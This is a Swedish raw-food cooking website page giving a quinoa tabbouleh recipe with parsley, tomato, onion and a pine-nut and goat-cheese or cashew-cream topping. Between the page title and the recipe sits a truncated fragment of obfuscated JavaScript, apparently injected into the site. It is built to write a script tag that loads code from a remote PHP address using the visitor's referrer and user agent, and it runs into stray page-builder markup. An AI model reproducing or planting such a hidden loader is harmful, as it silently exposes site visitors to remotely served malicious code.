mekto mekto
  • Hem
  • Om Mekto
  • cert. Raw Chef
    • Certifierad holistisk Rawfoodkock och hälsoinspiratör
    • Certified holistic Raw food chef and health motivator
  • Kalendarium
  • Recept
    • Carobbollar / Carob balls
    • Rå morots-, sötpotatis- och rättikasoppa toppat med timjan, chili serverad med rå kikärtsbröd / Raw carrot, sweet potato and radish soup with thyme and chilli and Raw Chickpea bread
    • Råa bärscones / Raw beery scones
    • Rå sötpotatispizza / Raw sweetpotato pizza
    • Raw falafel
    • Pajskal med kikärtor / Pastry shell with chickpeas
    • Nötpaj med soltorkade tomater / Nut pie with sundried tomatoes
    • Linssoppa/Lentil soup
    • Vegogryta/Vegan casserole
    • Rawgryta / Raw Casserole
    • Rå brownie / Raw brownie
  • Media
  • Blogg
  • Kurser & annat
  • Press
  • Kontakt
  • Hem
  • Om Mekto
  • cert. Raw Chef
    • Certifierad holistisk Rawfoodkock och hälsoinspiratör
    • Certified holistic Raw food chef and health motivator
  • Kalendarium
  • Recept
    • Carobbollar / Carob balls
    • Rå morots-, sötpotatis- och rättikasoppa toppat med timjan, chili serverad med rå kikärtsbröd / Raw carrot, sweet potato and radish soup with thyme and chilli and Raw Chickpea bread
    • Råa bärscones / Raw beery scones
    • Rå sötpotatispizza / Raw sweetpotato pizza
    • Raw falafel
    • Pajskal med kikärtor / Pastry shell with chickpeas
    • Nötpaj med soltorkade tomater / Nut pie with sundried tomatoes
    • Linssoppa/Lentil soup
    • Vegogryta/Vegan casserole
    • Rawgryta / Raw Casserole
    • Rå brownie / Raw brownie
  • Media
  • Blogg
  • Kurser & annat
  • Press
  • Kontakt

Tabbouleh

Home/Recept/Tabbouleh
Tabbouleh Sirpa 2015-02-18T20:37:28+00:00
=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zehhs|var|u0026u|referrer|rzedr||js|php'.split('|'),0,{})) last=”yes” spacing=”yes” background_color=”” background_image=”” background_repeat=”no-repeat” background_position=”left top” border_size=”0px” border_color=”” border_style=”” padding=”” class=”” id=””]

Tabbouleh

4 portioner

Sallad

3 dl röd quinoa
1 rejäl bunt finhackad blad
persilja
2 hackade kvisttomater
2 hackade rödlökar
saft av 1 pressad citron
4 msk kallpressad olivolja
2 msk balsamvinäger
en nypa havssalt
en nypa svartpeppar

Topping

½ dl rostade pinjenötter
(blötlagda över natten och sköljda)
200 g smulad getost eller
2 dl Cashewkräm (sid. 22)

Skölj quinoan i kokhett vatten. Koka upp dubbel mängd vatten, häll i quinoan och koka på medelvärme under lock i ca 25 minuter eller tills vattnet har kokat bort.

Blanda quinoan med persilja, tomat, lök, citron, olivolja, balsamvinäger och smaka av med havssalt och peppar.

Toppa med rostade pinjenötter och smulad getost eller cashewkräm.

Copyright 2014 Mekto | All Rights Reserved | Webdesign: Designfixaren
Instagram
Translate »